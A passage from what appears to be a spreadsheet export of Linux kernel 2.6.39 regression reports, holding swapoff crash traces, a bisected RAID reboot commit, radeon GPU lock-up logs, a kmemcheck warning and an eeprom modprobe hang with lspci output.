2398.167246] [&lt;c178dc40&gt;] ? vmalloc_fault+0x190/0x190 [ 2398.173104] [&lt;c178dc40&gt;] ? vmalloc_fault+0x190/0x190 [ 2398.178894] [&lt;c178b543&gt;] error_code+0x5f/0x64 [ 2398.184681] [&lt;c11200d8&gt;] ? vm_stat_account+0x28/0x50 [ 2398.190473] [&lt;c178dc40&gt;] ? vmalloc_fault+0x190/0x190 [ 2398.196195] [&lt;c110c191&gt;] ? shmem_swp_set+0x11/0x30 [ 2398.201952] [&lt;c110fb1d&gt;] shmem_unuse_inode+0x27d/0x380 [ 2398.207611] [&lt;c110fceb&gt;] shmem_unuse+0xcb/0x120 [ 2398.213224] [&lt;c112c638&gt;] try_to_unuse+0x238/0x4a0 [ 2398.218758] [&lt;c108dcad&gt;] ? put_lock_stats.isra.20+0xd/0x30 [ 2398.224189] [&lt;c108e23b&gt;] ? lock_release_holdtime.part.21+0x6b/0xd0 [ 2398.229484] [&lt;c178e10d&gt;] ? sub_preempt_count.part.170+0x4d/0x90 [ 2398.234604] [&lt;c178e174&gt;] ? sub_preempt_count+0x24/0x50 [ 2398.239623] [&lt;c112d55c&gt;] sys_swapoff+0x16c/0x450 [ 2398.244590] [&lt;c1791a98&gt;] sysenter_do_call+0x12/0x38 [ 2398.249456] BUG: scheduling while atomic: swapoff/14922/0x10000003 [ 2398.254382] INFO: lockdep is turned off. [ 2398.259257] Modules linked in: vboxnetadp vboxnetflt ebtable_nat ebtables acpi_cpufreq mperf uinput blowfish xcbc rmd160 nfsd hdaps tp_smapi thinkpad_ec radeonfb fb_ddc radeon ttm drm_kms_helper drm ipw2200 intel_agp intel_gtt i2c_algo_bit libipw i2c_i801 rng_core cfbfillrect agpgart cfbcopyarea cfbimgblt raid10 raid1 raid0 linear md_mod vboxdrv sr_mod cdrom [last unloaded: scsi_wait_scan] [ 2398.275647] Pid: 14922, comm: swapoff Tainted: G D W 2.6.39-rc7-thinkpad-t43-00897-ga2b9c1f-dirty #60 [ 2398.281114] Call Trace: [ 2398.286491] [&lt;c1771657&gt;] __schedule_bug+0x74/0x7b [ 2398.291953] [&lt;c1787fa0&gt;] schedule+0x6f0/0x730 [ 2398.297349] [&lt;c111a775&gt;] ? zap_pte_range+0xf5/0x3b0 [ 2398.302720] [&lt;c111abf6&gt;] ? unmap_page_range+0x1c6/0x230 [ 2398.308036] [&lt;c178e0c9&gt;] ? sub_preempt_count.part.170+0x9/0x90 [ 2398.313465] [&lt;c104f987&gt;] __cond_resched+0x17/0x30 [ 2398.318883] [&lt;c178829d&gt;] _cond_resched+0x2d/0x40 [ 2398.324300] [&lt;c111b20c&gt;] unmap_vmas+0x18c/0x310 [ 2398.329642] [&lt;c1121997&gt;] exit_mmap+0xb7/0x190 [ 2398.335000] [&lt;c10541d9&gt;] mmput.part.24+0x39/0x100 [ 2398.340394] [&lt;c10542ce&gt;] mmput+0x2e/0x40 [ 2398.345713] [&lt;c105af45&gt;] exit_mm+0xf5/0x120 [ 2398.351140] [&lt;c105b09b&gt;] do_exit+0x12b/0x440 [ 2398.356355] [&lt;c178c034&gt;] oops_end+0x94/0xd0 [ 2398.361462] [&lt;c1771236&gt;] no_context+0xc3/0xcb [ 2398.366485] [&lt;c1771366&gt;] __bad_area_nosemaphore+0x128/0x130 [ 2398.371560] [&lt;c10803df&gt;] ? sched_clock_local+0xcf/0x1d0 [ 2398.376575] [&lt;c1770c97&gt;] ? pte_offset_kernel+0x1e/0x2d [ 2398.381594] [&lt;c178da57&gt;] ? spurious_fault+0x87/0xe0 [ 2398.386523] [&lt;c178dabe&gt;] ? vmalloc_fault+0xe/0x190 [ 2398.391436] [&lt;c1771385&gt;] bad_area_nosemaphore+0x17/0x19 [ 2398.396312] [&lt;c178defc&gt;] do_page_fault+0x2bc/0x480 [ 2398.401124] [&lt;c1080725&gt;] ? local_clock+0x65/0x70 [ 2398.405843] [&lt;c178e174&gt;] ? sub_preempt_count+0x24/0x50 [ 2398.410546] [&lt;c108dcc2&gt;] ? put_lock_stats.isra.20+0x22/0x30 [ 2398.415297] [&lt;c178b53f&gt;] ? error_code+0x5b/0x64 [ 2398.420037] [&lt;c178dc40&gt;] ? vmalloc_fault+0x190/0x190 [ 2398.424740] [&lt;c178dc40&gt;] ? vmalloc_fault+0x190/0x190 [ 2398.429412] [&lt;c178b543&gt;] error_code+0x5f/0x64 [ 2398.434123] [&lt;c11200d8&gt;] ? vm_stat_account+0x28/0x50 [ 2398.438809] [&lt;c178dc40&gt;] ? vmalloc_fault+0x190/0x190 [ 2398.443544] [&lt;c110c191&gt;] ? shmem_swp_set+0x11/0x30 [ 2398.448201] [&lt;c110fb1d&gt;] shmem_unuse_inode+0x27d/0x380 [ 2398.452909] [&lt;c110fceb&gt;] shmem_unuse+0xcb/0x120 [ 2398.457573] [&lt;c112c638&gt;] try_to_unuse+0x238/0x4a0 [ 2398.462235] [&lt;c108dcad&gt;] ? put_lock_stats.isra.20+0xd/0x30 [ 2398.466893] [&lt;c108e23b&gt;] ? lock_release_holdtime.part.21+0x6b/0xd0 [ 2398.471601] [&lt;c178e10d&gt;] ? sub_preempt_count.part.170+0x4d/0x90 [ 2398.476352] [&lt;c178e174&gt;] ? sub_preempt_count+0x24/0x50 [ 2398.481059] [&lt;c112d55c&gt;] sys_swapoff+0x16c/0x450 [ 2398.485774] [&lt;c1791a98&gt;] sysenter_do_call+0x12/0x38 # swapoff /dev/dm-4 Ivalid argument # swapon /dev/dm-4 Device busy I generally can reproduce this bug in number of ways (always with swapoff). The dmesg I present above is one of the most bad looking. The bug is not because system is lacking memory. But in most cases, I just got [ 2397.700674] WARNING: at arch/x86/mm/highmem_32.c:81 __kunmap_atomic+0xdc/0xf0(), but after waiting 30 second, /dev/dm-4 swap is disabled properly, and everything looks to be working OK. (until i start messing again with swap, like swapon /dev/dm-4, to make it back, and then swapoff /dev/zram0, it will quickly BUG somewhere, and after that freeze system).</t>
  </si>
  <si>
    <t>[BISECTED] 2.6.39rc: kobject-related reboot after RAID array initialization(?) post-QUEUE_FLAG_REENTER-removal</t>
  </si>
  <si>
    <t>2011-05-19 17:34 UTC</t>
  </si>
  <si>
    <t>2011-06-07 07:56 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTED] 2.6.39rc: kobject-related reboot after RAID array initialization(?) post-QUEUE_FLAG_REENTER-removal Submitter : Nix &lt;nix@esperi.org.uk&gt; Date : 2011-05-15 22:05 Message-ID : 8762pboc0j.fsf@spindle.srvr.nix References : http://marc.info/?l=linux-kernel&amp;m=130549836609128&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline. Caused by: commit c21e6beba8835d09bb80e34961430b13e60381c5 Author: Jens Axboe &lt;jaxboe@fusionio.com&gt; Date: Tue Apr 19 13:32:46 2011 +0200 block: get rid of QUEUE_FLAG_REENTER Signed-off-by: Jens Axboe &lt;jaxboe@fusionio.com&gt; First-Bad-Commit : c21e6beba8835d09bb80e34961430b13e60381c5</t>
  </si>
  <si>
    <t>[bisected] [r600] radeondrmfb rendering is broken and running X makes GPU lock-up on RV770 CE (Radeon HD 4730)</t>
  </si>
  <si>
    <t>2011-05-20 04:03 UTC</t>
  </si>
  <si>
    <t>Sergey Kondakov</t>
  </si>
  <si>
    <t>2011-07-05 11:38 UTC</t>
  </si>
  <si>
    <t>with 2.6.37 it's all OK but since 2.6.38 from very framebuffer initialization screen is filled with dense grey lines looking like ugly grid. also per every 3cm on my 1920x1080/23' screen there is a distinctive whitish vertical line. when X try to startup i can see cursor and can move it around for a while (that grey grid is there too) but kdm does not starting up and GPU locks up. it is the same with 2.6.39. here is `dmesg|grep drm` for 2.6.39: [ 0.462282] [drm] Initialized drm 1.1.0 20060810 [ 0.462315] [drm] radeon defaulting to kernel modesetting. [ 0.462337] [drm] radeon kernel modesetting enabled. [ 0.462575] [drm] initializing kernel modesetting (RV770 0x1002:0x944E). [ 0.462608] [drm] register mmio base: 0xFDFE0000 [ 0.462630] [drm] register mmio size: 65536 [ 0.463313] [drm] Detected VRAM RAM=512M, BAR=256M [ 0.463343] [drm] RAM width 128bits DDR [ 0.463526] [drm] radeon: 512M of VRAM memory ready [ 0.463549] [drm] radeon: 512M of GTT memory ready. [ 0.463571] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010). [ 0.463594] [drm] Driver supports precise vblank timestamp query. [ 0.463708] [drm] radeon: irq initialized. [ 0.463733] [drm] GART: num cpu pages 131072, num gpu pages 131072 [ 0.465260] [drm] Loading RV770 Microcode [ 0.512429] [drm] ring test succeeded in 1 usecs [ 0.512544] [drm] radeon: ib pool ready. [ 0.512584] [drm] ib test succeeded in 0 usecs [ 0.512609] [drm] Enabling audio support [ 0.512805] [drm] Radeon Display Connectors [ 0.512827] [drm] Connector 0: [ 0.512847] [drm] DVI-I [ 0.512868] [drm] HPD2 [ 0.512889] [drm] DDC: 0x7e60 0x7e60 0x7e64 0x7e64 0x7e68 0x7e68 0x7e6c 0x7e6c [ 0.512915] [drm] Encoders: [ 0.512936] [drm] DFP1: INTERNAL_UNIPHY [ 0.512957] [drm] CRT2: INTERNAL_KLDSCP_DAC2 [ 0.512979] [drm] Connector 1: [ 0.512999] [drm] DIN [ 0.513028] [drm] Encoders: [ 0.513049] [drm] TV1: INTERNAL_KLDSCP_DAC2 [ 0.513070] [drm] Connector 2: [ 0.513091] [drm] DVI-I [ 0.513111] [drm] HPD1 [ 0.513132] [drm] DDC: 0x7e20 0x7e20 0x7e24 0x7e24 0x7e28 0x7e28 0x7e2c 0x7e2c [ 0.513158] [drm] Encoders: [ 0.513179] [drm] CRT1: INTERNAL_KLDSCP_DAC1 [ 0.513201] [drm] DFP2: INTERNAL_KLDSCP_LVTMA [ 0.577285] [drm] Internal thermal controller without fan control [ 0.578307] [drm] radeon: power management initialized [ 0.657478] [drm] fb mappable at 0xD0142000 [ 0.657500] [drm] vram apper at 0xD0000000 [ 0.657521] [drm] size 8294400 [ 0.657541] [drm] fb depth is 24 [ 0.657562] [drm] pitch is 7680 [ 0.657632] fbcon: radeondrmfb (fb0) is primary device [ 1.073319] fb0: radeondrmfb frame buffer device [ 1.073349] drm: registered panic notifier [ 1.073379] [drm] Initialized radeon 2.9.0 20080528 for 0000:01:00.0 on minor 0 [ 252.565034] WARNING: at drivers/gpu/drm/radeon/radeon_fence.c:246 radeon_fence_wait+0x3a6/0x400() [ 252.565102] [&lt;ffffffff8137c334&gt;] ? drm_ioctl+0x394/0x450 [ 252.565145] [drm] Disabling audio support [ 252.731618] [drm] ring test succeeded in 1 usecs [ 252.908838] [drm:r600_ib_test] *ERROR* radeon: ib test failed (scratch(0x8504)=0xCAFEDEAD) [ 252.908841] [drm:rv770_resume] *ERROR* radeon: failed testing IB (-22). [ 267.523039] WARNING: at drivers/gpu/drm/radeon/radeon_fence.c:246 radeon_fence_wait+0x3a6/0x400() [ 267.523107] [&lt;ffffffff8137c334&gt;] ? drm_ioctl+0x394/0x450 [ 268.216464] [drm] ring test succeeded in 1 usecs [ 268.216473] [drm] ib test succeeded in 1 usecs [ 268.216475] [drm] Enabling audio support [ 273.719044] WARNING: at drivers/gpu/drm/radeon/radeon_fence.c:246 radeon_fence_wait+0x3a6/0x400() [ 273.719114] [&lt;ffffffff8137c334&gt;] ? drm_ioctl+0x394/0x450 [ 273.719159] [drm] Disabling audio support [ 274.411517] [drm] ring test succeeded in 1 usecs [ 274.588784] [drm:r600_ib_test] *ERROR* radeon: ib test failed (scratch(0x8504)=0xCAFEDEAD) [ 274.588787] [drm:rv770_resume] *ERROR* radeon: failed testing IB (-22). [ 290.090036] WARNING: at drivers/gpu/drm/radeon/radeon_fence.c:246 radeon_fence_wait+0x3a6/0x400() [ 290.090103] [&lt;ffffffff8137c334&gt;] ? drm_ioctl+0x394/0x450 [ 290.779828] [drm] ring test succeeded in 1 usecs [ 290.957091] [drm:r600_ib_test] *ERROR* radeon: ib test failed (scratch(0x8504)=0xCAFEDEAD) [ 290.957094] [drm:rv770_resume] *ERROR* radeon: failed testing IB (-22). [ 306.459037] WARNING: at drivers/gpu/drm/radeon/radeon_fence.c:246 radeon_fence_wait+0x3a6/0x400() [ 306.459105] [&lt;ffffffff8137c334&gt;] ? drm_ioctl+0x394/0x450 [ 307.153106] [drm] ring test succeeded in 1 usecs [ 307.330842] [drm:r600_ib_test] *ERROR* radeon: ib test failed (scratch(0x8504)=0xCAFEDEAD) [ 307.330845] [drm:rv770_resume] *ERROR* radeon: failed testing IB (-22).</t>
  </si>
  <si>
    <t>Caught 64-bit read from uninitialized memory in process_one_work</t>
  </si>
  <si>
    <t>2011-05-21 08:52 UTC</t>
  </si>
  <si>
    <t>2011-09-01 17:01 UTC</t>
  </si>
  <si>
    <t>Acer Aspire 7750G Slackware64 13.37 Core i7 2630QM in 64bits 6GB RAM With Kernel 2.6.39 (and even some -rc before), but not tested with previous versions, I get the following warning at boot with kmemcheck and other hacking options activated: ... pci 0000:00:16.0: PME# disabled pci 0000:00:1a.0: [8086:1c2d] type 0 class 0x000c03 pci 0000:00:1a.0: reg 10: [mem 0xc130a000-0xc130a3ff] WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff8801c67697d8) 0000000000000000b5e0a481ffffffff00000000000000000000000000000000 i i i i i i i i i i i i i i i i i i i i u u u u u u u u u u u u ^ Pid: 1, comm: swapper Not tainted 2.6.39 #1 Acer Aspire 7750G/JE70_HR RIP: 0010:[&lt;ffffffff810900e3&gt;] [&lt;ffffffff810900e3&gt;] process_one_work+0x83/0x450 RSP: 0018:ffff8801c651dd80 EFLAGS: 00010006 RAX: 0000000000000000 RBX: ffff8801c64ea240 RCX: 0000000000000000 RDX: ffff8801c79d6c00 RSI: ffff8801c6769790 RDI: ffff8801c64ea240 RBP: ffff8801c651de10 R08: 0000000000000400 R09: 0000000000000001 R10: 0000000000000000 R11: 0000000000000000 R12: ffff8801c6769790 R13: ffff8801c79d6c00 R14: ffff8801c780ddc0 R15: 000000000000000f FS: 0000000000000000(0000) GS:ffff8801c7800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: ffff8801c741faf8 CR3: 0000000001c03000 CR4: 00000000000406f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 [&lt;ffffffff8109348c&gt;] worker_thread+0x15c/0x330 [&lt;ffffffff81097ff6&gt;] kthread+0xa6/0xb0 [&lt;ffffffff817a14d4&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff pci 0000:00:1a.0: PME# supported from D0 D3hot D3cold pci 0000:00:1a.0: PME# disabled pci 0000:00:1b.0: [8086:1c20] type 0 class 0x000403 pci 0000:00:1b.0: reg 10: [mem 0xc1300000-0xc1303fff 64bit] ... Other than that, everything works fine. Full dmesg appended. This may be the same as this bug I reported on another older laptop, since the call stack begins the same, but on my new laptop I only get the above: https://bugzilla.kernel.org/show_bug.cgi?id=34882</t>
  </si>
  <si>
    <t>eeprom module: modprobing hangs</t>
  </si>
  <si>
    <t>2011-05-21 20:17 UTC</t>
  </si>
  <si>
    <t>2012-08-26 10:49 UTC</t>
  </si>
  <si>
    <t>modbrobing eeprom module hangs, but does not crash the kernel. Occurs with 2.6.39, with 2.6.38 and prev works ok. Confirmed by other user, the bug reported in Arch can be found here: https://bugs.archlinux.org/24376 my HW: i686, archlinux kernel (no relevant patch, almost same as mainline : ftp://ftp.archlinux.org/other/kernel26/patch-2.6.39-1-ARCH.bz2 ), part from dmesg when modprobing eeprom: 57.222509] tg3 0000:02:00.0: eth0: Flow control is on for TX and on for RX [ 57.223449] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready [ 67.936739] eth0: no IPv6 routers present [ 93.797133] ip_tables: (C) 2000-2006 Netfilter Core Team [ 94.057661] nf_conntrack version 0.5.0 (16384 buckets, 65536 max) [ 106.272909] EXT4-fs (sda4): re-mounted. Opts: commit=0 [ 106.957966] EXT4-fs (sda9): re-mounted. Opts: commit=0 [ 107.181605] EXT4-fs (sda2): re-mounted. Opts: commit=0 [ 107.331670] EXT4-fs (sda12): re-mounted. Opts: commit=0 [ 136.933416] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 136.986739] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 137.043440] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 137.096738] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 137.150067] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 137.203415] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 137.256761] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 137.310101] [drm] GMBUS timed out, falling back to bit banging on pin 0 [i915 gmbus disabled] [ 137.523400] [drm] GMBUS timed out, falling back to bit banging on pin 4 [i915 gmbus dpc] [ 178.299024] kwin_opengl_tes[3439]: segfault at 2c ip b70a5c48 sp bfb90520 error 4 in i915_dri.so[b706c000+35b000] [ 213.183783] process `skype' is using obsolete setsockopt SO_BSDCOMPAT lspci -vvv 00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03) Subsystem: Lenovo Device 386f Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=09 &lt;?&gt; Kernel driver in use: agpgart-intel Kernel modules: intel-agp 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03) (prog-if 00 [VGA controller]) Subsystem: Lenovo Device 3870 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at f0300000 (32-bit, non-prefetchable) [size=512K] Region 1: I/O ports at 1800 [size=8] Region 2: Memory at d0000000 (32-bit, prefetchable) [size=256M] Region 3: Memory at f0400000 (32-bit, non-prefetchable) [size=256K] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [90] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: i915 Kernel modules: i915 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) Subsystem: Lenovo Device 3870 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Region 0: Memory at f0380000 (32-bit, non-prefetchable) [size=512K] Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- 00:1b.0 Audio device: Intel Corporation N10/ICH 7 Family High Definition Audio Controller (rev 02) Subsystem: Lenovo Device 3bf8 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 43 Region 0: Memory at f0440000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0300c Data: 4179 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=1 ArbSelect=Fixed TC/VC=80 Status: NegoPending- InProgress- Capabilities: [130 v1] Root Complex Link Desc: PortNumber=0f ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel 00:1c.0 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 1 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 00002000-00002fff Memory behind bridge: f0100000-f01fffff Prefetchable memory behind bridge: 00000000f0000000-00000000f00fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #1, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #2, PowerLimit 6.500W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet+ CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4151 Capabilities: [90] Subsystem: Intel Corporation Device 1999 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable- ID=0 ArbSelect=Fixed TC/VC=00 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=01 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c001 Kernel driver in use: pcieport Kernel modules: shpchp 00:1c.1 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 2 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 00004000-00004fff Memory behind bridge: 80200000-803fffff Prefetchable memory behind bridge: 0000000080400000-00000000805fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #3, PowerLimit 6.500W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet+ CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4159 Capabilities: [90] Subsystem: Intel Corporation Device 1999 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=ff Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- 